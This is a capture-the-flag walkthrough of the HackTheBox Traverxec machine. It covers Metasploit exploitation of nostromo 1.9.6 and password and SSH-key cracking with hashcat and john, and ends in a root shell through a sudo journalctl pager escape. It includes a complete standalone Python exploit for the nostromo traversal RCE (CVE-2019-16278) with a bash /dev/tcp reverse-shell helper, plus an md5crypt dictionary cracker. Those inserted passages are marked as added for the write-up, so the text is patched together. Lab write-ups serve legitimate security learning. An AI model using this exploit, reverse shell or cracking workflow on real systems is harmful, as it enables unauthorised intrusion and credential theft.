HTB Traverxec Walkthrough

Welcome to my write up of how I hacked the Traverxec box on HackTheBox!

Let's jump right in and start with an nmap scan:

nmap -T4 -A -v

And this is the interesting result:

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).

OK, only two open ports, and one of them serves a web portal, so my approach takes me straight to the portal:

After navigating around and analysing the portal I find nothing interesting. To gather more information I use tools like OWASP ZAP and wfuzz to look for vulnerabilities or entry points (including the form at the bottom of the page), but nothing emerges. Anyway, there is another interesting piece of information in the nmap result: the name and version of the web server, nostromo 1.9.6.

I search exploit-db and immediately find a reverse-shell exploit for it. It should also be in the Metasploit framework, so I launch msfconsole and proceed. The only parameters I have to set are rhosts (the IP address of the target) and lhost (my own IP address).

msf5 > search nostromo

Matching Modules

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution

msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set rhosts
rhosts =>
msf5 exploit(multi/http/nostromo_code_exec) > set lhost
lhost =>
msf5 exploit(multi/http/nostromo_code_exec) > options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST          yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)

msf5 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 3 opened ( -> at 2020-03-07 18:00:31 +0100
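To show what the module actually sends, here is an added example, written for this write-up and not taken from the original post or from the Metasploit module: it reproduces the directory-traversal request by hand. The module's name describes the bug (CVE-2019-16278, nostromo up to 1.9.6, fixed in 1.9.7): the server rejects a request path containing `/../`, but not `/.%0d./`, and the percent-encoded carriage return is discarded after that check, so four of them walk up to `/` and the request ends up executing `/bin/sh` with the POST body as its standard input. The hostname `traverxec.htb`, the listener address and port, and the `id` command are placeholders.

```python
import argparse
import re
import socket

# Request path that slips past nostromo's traversal check (CVE-2019-16278):
# "/../" is rejected, "/.%0d./" is not, and the CR is dropped after the check,
# so four of them climb to "/" and nhttpd ends up executing /bin/sh with the
# request body on its stdin.
TRAVERSAL_PATH = "/.%0d./.%0d./.%0d./.%0d./bin/sh"


def version_is_vulnerable(server_header: str) -> bool:
    """True for a Server header announcing nostromo 1.9.6 or older."""
    m = re.search(r"nostromo\s+(\d+)\.(\d+)\.(\d+)", server_header, re.I)
    if not m:
        return False
    return tuple(int(x) for x in m.groups()) <= (1, 9, 6)


def build_request(cmd: str, host: str = "traverxec.htb") -> bytes:
    """Raw HTTP/1.0 request that makes nhttpd run `cmd` through /bin/sh.

    The body is what /bin/sh reads. The two leading `echo` lines are part of
    the public proof-of-concept payload for this bug; the command follows
    them, with stderr merged so error output comes back in the response too.
    `host` is a placeholder; the Content-Length value is the one the PoC uses.
    """
    body = f"echo\necho\n{cmd} 2>&1\n"
    head = (
        f"POST {TRAVERSAL_PATH} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "Content-Length: 1\r\n"
        "\r\n"
    )
    return head.encode() + body.encode()


def run_command(host: str, port: int, cmd: str, timeout: float = 10.0) -> str:
    """Send one command to the target and return whatever the shell printed."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(cmd, host))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def reverse_shell_command(lhost: str, lport: int) -> str:
    """Same idea as the module's reverse_perl payload, using bash's /dev/tcp.

    /bin/sh on Debian is dash, which has no /dev/tcp, so bash is invoked
    explicitly. lhost/lport are the attacker's listener (placeholders here).
    """
    return f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="nostromo <= 1.9.6 traversal RCE, by hand")
    ap.add_argument("host")
    ap.add_argument("-p", "--port", type=int, default=80)
    ap.add_argument("-c", "--cmd", default="id")
    args = ap.parse_args()
    print(run_command(args.host, args.port, args.cmd))
```

Run it as `python3 nostromo_rce.py <target> -c id` to confirm execution as `www-data` before spending a listener on it; `version_is_vulnerable()` is the cheap pre-check against the `Server:` header that nmap already printed above.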

As usual, I report only the interesting phases of my attack, but this time I'd like to describe an interesting "rabbit hole" which, in the end, won't be useful to complete the CTF challenge, but is interesting in itself and, in my opinion, can give all of us (or at least some of us) additional know-how.

In the /var folder I find the nostromo directory with its configuration file.

ls -l /var
total 40
drwxr-xr-x  2 root root  4096 Nov 12 06:25 backups
drwxr-xr-x  9 root root  4096 Oct 25 14:34 cache
drwxr-xr-x 26 root root  4096 Nov 12 04:56 lib
drwxrwsr-x  2 root staff 4096 May 13  2019 local
lrwxrwxrwx  1 root root     9 Oct 25 14:15 lock -> /run/lock
drwxr-xr-x  5 root root  4096 Mar  7 07:59 log
drwxrwsr-x  2 root mail  4096 Oct 25 14:15 mail
drwxr-xr-x  6 root root  4096 Oct 25 14:43 nostromo
drwxr-xr-x  2 root root  4096 Oct 25 14:15 opt
lrwxrwxrwx  1 root root     4 Oct 25 14:15 run -> /run
drwxr-xr-x  4 root root  4096 Oct 25 14:16 spool
drwxrwxrwt  3 root root  4096 Mar  7 08:43 tmp
ls -l /var/nostromo
total 16
drwxr-xr-x 2 root     daemon 4096 Oct 27 16:12 conf
drwxr-xr-x 6 root     daemon 4096 Oct 25 17:11 htdocs
drwxr-xr-x 2 root     daemon 4096 Oct 25 14:43 icons
drwxr-xr-x 2 www-data daemon 4096 Mar  7 07:59 logs
ls -l /var/nostromo/conf
total 8
-rw-r--r-- 1 root bin 2928 Oct 25 14:26 mimes
-rw-r--r-- 1 root bin  498 Oct 25 15:20 nhttpd.conf
cat /var/nostromo/conf/nhttpd.conf

servername              traverxec.htb
serverlisten            *
serveradmin             [email protected]
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html


logpid                  logs/


user                    www-data


htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd


/icons                  /var/nostromo/icons


homedirs                /home
homedirs_public         public_www

cat /var/nostromo/conf/.htpasswd

At the bottom of the file there's an interesting entry: it seems to be david's credential, but the password is hashed, so we have to recover the original.

So I decide to use a hash analyzer; I report the link here:

As you can see, it is a (so to speak) simple MD5-crypt hash with a salt: the salt and the hash are visible in the string, separated by the "$" character, and the "$1$" prefix at the beginning identifies the algorithm. I tried with john the ripper, but probably I got some parameter wrong and couldn't get a result (john does recognise the "$1$" prefix on its own, so a plain wordlist run against the hash file should have worked). Anyway, back on the analyzer page I found some interesting links and discovered another tool, hashcat, used to crack hashes. To understand how to use it I followed this page:

It has a list of all the hash types known so far (and there are many); what I did was search for my specific hash type, so I would know the mode parameter that selects the correct algorithm. Searching for the "$1$" string I found only one occurrence:

500  md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) 2  $1$28772684$iEwNOgGugqO9.bIz5sk8k/
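To make the "$1$" format concrete, here is an added example (mine, not from the write-up, hashcat or john): a pure-Python md5crypt following the FreeBSD reference algorithm, a parser for `user:$1$salt$hash` lines as found in an `.htpasswd` file, and a dictionary attack that recomputes the hash with the stored salt for each candidate. The `.htpasswd` line and the wordlist are constructed for the demo; the hash in it is hashcat's documented example for mode 500 (the one in the table above, plaintext `hashcat`), so the result can be checked.

```python
import hashlib
from typing import Iterable, Optional, Tuple

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"


def _to64(value: int, count: int) -> str:
    """crypt(3)'s own base64 variant: least significant 6 bits first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password: bytes, salt: bytes) -> str:
    """FreeBSD md5crypt ($1$), as produced by `htpasswd -m` and old /etc/shadow.

    The 1000 fixed rounds are the only work factor; there is no tunable cost,
    which is why a CPU gets through rockyou in under an hour in the write-up.
    """
    salt = salt[:8]  # at most 8 salt characters, terminated by '$'
    ctx = hashlib.md5(password + MAGIC + salt)
    alt = hashlib.md5(password + salt + password).digest()
    # Mix in as many bytes of the alternate digest as the password is long
    pl = len(password)
    while pl > 0:
        ctx.update(alt[:min(pl, 16)])
        pl -= 16
    # The "something really weird" step of the reference implementation:
    # one bit of the length per round selects a NUL byte or the first char
    i = len(password)
    while i:
        ctx.update(b"\0" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 stretching rounds with a round-number-dependent mixing pattern
    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(password if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(password)
        ctx1.update(final if i & 1 else password)
        final = ctx1.digest()
    # Permuted output encoding: 16 digest bytes -> 22 characters
    f = final
    encoded = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return (MAGIC + salt).decode() + "$" + encoded


def parse_htpasswd_line(line: str) -> Tuple[str, str, str]:
    """Split 'user:$1$salt$hash' into (user, salt, full digest string)."""
    user, sep, digest = line.strip().partition(":")
    if not sep or not digest.startswith("$1$"):
        raise ValueError("expected 'user:$1$salt$hash'")
    fields = digest.split("$")  # ['', '1', salt, hash]
    if len(fields) != 4 or not fields[3]:
        raise ValueError("malformed md5crypt entry")
    return user, fields[2], digest


def crack(digest: str, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Dictionary attack: rehash every candidate with the stored salt."""
    salt = digest.split("$")[2].encode()
    for candidate in wordlist:
        if md5crypt(candidate, salt) == digest:
            return candidate
    return None


# Constructed demo input: hashcat's documented mode-500 example hash
SAMPLE_HTPASSWD_LINE = "david:$1$28772684$iEwNOgGugqO9.bIz5sk8k/"
SAMPLE_WORDLIST = [b"password", b"Nov25th", b"hashcat", b"letmein"]

if __name__ == "__main__":
    user, salt, digest = parse_htpasswd_line(SAMPLE_HTPASSWD_LINE)
    print(f"{user}: salt={salt} -> {crack(digest, SAMPLE_WORDLIST)}")
```

The salt is public, so every candidate costs one full md5crypt run per target hash; that fixed 1000-iteration cost, not any secret, is all that separates a leaked `.htpasswd` from its plaintext.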

So I launch the command and cross my fingers.

[email protected]:/root/Desktop/hackthebox/_Traverxec -$ hashcat -m 500 --force hash.txt /usr/share/wordlists/rockyou.txt     
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz, 1024/2900 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=500 -D _unroll'
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Cracked
Hash.Type........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: $1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
Time.Started.....: Sat Mar  7 16:33:12 2020 (51 mins, 3 secs)
Time.Estimated...: Sat Mar  7 17:24:15 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     3549 H/s (8.83ms) @ Accel:128 Loops:125 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10776576/14344385 (75.13%)
Rejected.........: 0/10776576 (0.00%)
Restore.Point....: 10776320/14344385 (75.13%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidates.#1....: Nowonly4me -> Nov25th

Started: Sat Mar  7 16:33:08 2020
Stopped: Sat Mar  7 17:24:17 2020

OK, as you can see, on my slow PC the whole process took about fifty minutes.

We have a password now, but let me say that I never used this information during the rest of the challenge (or rather, I tried, but it never turned out to be useful).

For example, I try to log in through SSH as the david user...

[email protected]:/root/Desktop/hackthebox/_Traverxec -$ ssh [email protected]
[email protected]'s password: 
Permission denied, please try again.

...but, as you can see, I can't. That is no surprise: an `.htpasswd` entry is a web-server credential, and nothing requires it to match the account's system password.

I thought it could probably be used on the portal, so I go back to wfuzz to search again for hidden paths on the site.

[email protected]:/root/Desktop/hackthebox/_Traverxec -$ wfuzz -t 1 -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc=404

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

* Wfuzz 2.4.5 - The Web Fuzzer                         *

Total requests: 949

ID           Response   Lines    Word     Chars       Payload
===================================================================

000000223:   200        17 L     46 W     602 Ch      "css"
000000409:   200        18 L     55 W     736 Ch      "icons"
000000413:   200        30 L     163 W    2625 Ch     "img"
000000454:   200        17 L     46 W     596 Ch      "js" 
000000469:   200        23 L     100 W    1487 Ch     "lib"                                       

Total time: 161.0141
Processed Requests: 949
Filtered Requests: 944
Requests/sec.: 5.893893

I used different wordlists, but found nothing, so I go back to the only way in I have: the shell on the nostromo web service. I navigate again through the machine's folders and finally find something. Reading the nostromo configuration file again (where I found the hashed password earlier) I notice this:


homedirs                /home
homedirs_public         public_www

I look under /home for the public_www folder, but it doesn't show up: the only entry in /home is david's folder, and listing it returns nothing. That is not because it is empty. The directory is mode drwx--x--x (it appears as `..` in the listing of ~/bin later on), so www-data may traverse it but not read it, and a path inside it still works if you know the name. The directive also tells the web server what to do: nostromo serves `/~david/` from `/home/david/public_www`, and a subdirectory containing an `.htaccess` file is protected with basic auth against the `.htpasswd` file named in nhttpd.conf, which is where the cracked password is actually meant to be used. So, with a little imagination, I try the name from the configuration directly.

ls -l /home/david/public_www/
total 8
-rw-r--r-- 1 david david  402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area
ls -l /home/david/public_www/protected-file-area
total 4
-rw-r--r-- 1 david david 1915 Oct 25 17:02 backup-ssh-identity-files.tgz

OK, a nice surprise. Let's have a look inside the compressed file.

tar -tvf /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz
drwx------ david/david       0 2019-10-25 17:02 home/david/.ssh/
-rw-r--r-- david/david     397 2019-10-25 17:02 home/david/.ssh/authorized_keys
-rw------- david/david    1766 2019-10-25 17:02 home/david/.ssh/id_rsa
-rw-r--r-- david/david     397 2019-10-25 17:02 home/david/.ssh/

Uh-huh... if what's inside is what I think, I should be close to the first flag, so let's extract it and dig deeper.

mkdir /tmp/mydatakkk
ls -l /tmp/mydatakkk
total 0
tar zxvf /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz -C /tmp/mydatakkk
ls -l /tmp/mydatakkk/home/david/.ssh
total 12
-rw-r--r-- 1 www-data www-data  397 Oct 25 17:02 authorized_keys
-rw------- 1 www-data www-data 1766 Oct 25 17:02 id_rsa
-rw-r--r-- 1 www-data www-data  397 Oct 25 17:02
cat /tmp/mydatakkk/home/david/.ssh/id_rsa
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F

cat /tmp/mydatakkk/home/david/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD [email protected]
cat /tmp/mydatakkk/home/david/.ssh/
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD [email protected]

Yes, it's what I think. The `Proc-Type: 4,ENCRYPTED` and `DEK-Info: AES-128-CBC` headers mean the private key is in the legacy PEM format, protected by a passphrase through OpenSSL's MD5-based key derivation with a single iteration (john reports this below as cost 0=MD5/AES, iteration count 1), so each guess costs about one MD5 plus one AES block: it will crack fast. I copy the private key to my local machine and this time john the ripper is my best friend.

[email protected]:~/Desktop/hackthebox/_Traverxec - python3 /usr/share/john/ id_rsa > id_rsa.hash
/usr/share/john/ DeprecationWarning: decodestring() is a deprecated alias since Python 3.1, use decodebytes()
  data = base64.decodestring(data)

[email protected]:/root/Desktop/hackthebox/_Traverxec -$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
1g 0:00:00:11 DONE (2020-03-08 12:15) 0.08547g/s 1225Kp/s 1225Kc/s 1225KC/sa6_123..*7¡Vamos!
Session completed

Good, the next step is to connect through SSH to the target machine and again cross my fingers.

[email protected]:/root/Desktop/hackthebox/_Traverxec -$ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Sun Mar  8 07:11:16 2020 from
david@traverxec:~$ pwd
david@traverxec:~$ ls -l
total 60
drwx------ 3 david david  4096 Mar  8 07:12 bin
-rwxr-xr-x 1 david david 46631 Mar  1 14:36
drwxr-xr-x 3 david david  4096 Oct 25 15:45 public_www
-r--r----- 1 root  david    33 Oct 25 16:14 user.txt
david@traverxec:~$ cat user.txt

And the first flag is taken.

Now, I have to confess that I went around in circles for many hours before finding something and, let me say, I had to resort to help from a forum. In david's folder there's a directory named "bin"; inside it there's a sh file with an interesting command.

david@traverxec:~/bin$ ls -la 
total 24
drwx------ 2 david david 4096 Mar  8 09:33 .
drwx--x--x 6 david david 4096 Mar  8 09:42 ..
-rw------- 1 david david 1460 Mar  8 09:33
-rw------- 1 david david 1460 Mar  8 09:33
-r-------- 1 david david  802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david  363 Oct 25 16:26
david@traverxec:~/bin$ cat 

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

The last line runs journalctl through sudo with superuser permissions. I can launch it from the shell exactly as written, but if I change any of the arguments the system asks me for a password (yes, I tried the one cracked earlier, but as I said, it doesn't work). This is consistent with a sudoers rule that lets david run exactly `/usr/bin/journalctl -n5 -unostromo.service` without a password; `sudo -l` would show the precise rule.

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sun 2020-03-08 09:28:40 EDT, end at Sun 2020-03-08 10:29:23 EDT. --
Mar 08 10:26:47 traverxec sudo[1781]: www-data : command not allowed ; TTY=pts/6 ; PWD=/ ; USER=root ; COMMAND=list
Mar 08 10:26:58 traverxec sudo[1788]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/
Mar 08 10:27:08 traverxec sudo[1788]: www-data : command not allowed ; TTY=pts/5 ; PWD=/tmp ; USER=root ; COMMAND=list
Mar 08 10:27:15 traverxec su[1793]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/5 ruser=w
Mar 08 10:27:17 traverxec su[1793]: FAILED SU (to root) www-data on pts/5
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n6 -unostromo.service
[sudo] password for david: 
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl
[sudo] password for david: 
david@traverxec:~/bin$ 

The important tip I read in the forum was about GTFOBins, which I didn't know. GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. Nice, so I understand that I can search there for something to use for privilege escalation and, fortunately, I find an entry for the journalctl command.

OK, I think it should be done. The trick behind the GTFOBins entry: when its output does not fit on the screen, journalctl hands it to a pager (less by default), and from less the command `!/bin/sh` spawns a shell as the user running the pager, which under sudo is root. The script avoids the pager by piping into `/usr/bin/cat`, but the sudo rule only covers the journalctl command itself, so I run it on its own in a terminal window too small to show the header plus five lines, type `!/bin/sh` at the less prompt, and the second flag should be mine. (A sudo rule for journalctl should at least include `--no-pager`; otherwise any pager escape is a root shell.)

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sun 2020-03-08 09:28:40 EDT, end at Sun 2020-03-08 10:36:07 EDT. --
Mar 08 10:30:37 traverxec su[1843]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/6 ruser=w
Mar 08 10:30:39 traverxec su[1843]: FAILED SU (to david) www-data on pts/6
Mar 08 10:35:17 traverxec sudo[2080]: pam_unix(sudo:auth): conversation failed
Mar 08 10:35:17 traverxec sudo[2080]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Mar 08 10:35:17 traverxec sudo[2080]: www-data : user NOT in sudoers ; TTY=pts/6 ; PWD=/ ; USER=root ; COMMAND=/usr/bin
# ls -l
total 16
-rw------- 1 david david 1460 Mar  8 09:33
-rw------- 1 david david 1460 Mar  8 09:33
-r-------- 1 david david  802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david  363 Oct 25 16:26
# ls -la /root  
total 68
drwx------  3 root root  4096 Mar  8 09:46 .
drwxr-xr-x 18 root root  4096 Oct 25 14:17 ..
lrwxrwxrwx  1 root root     9 Oct 25 16:21 .bash_history -> /dev/null
-rw-r--r--  1 root root   570 Jan 31  2010 .bashrc
-rw-------  1 root root    47 Mar  8 09:46 .lesshst
drwxr-xr-x  3 root root  4096 Nov 12 04:00 .local
-rw-r--r--  1 root root 37520 Oct 25 14:43 nostromo_1.9.6-1.deb
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-r--------  1 root root    33 Oct 25 16:21 root.txt
# cat /root/root.txt

That's all folks!

The awesome image used in this article is called Braaaaains and it was created by Graham Erwin.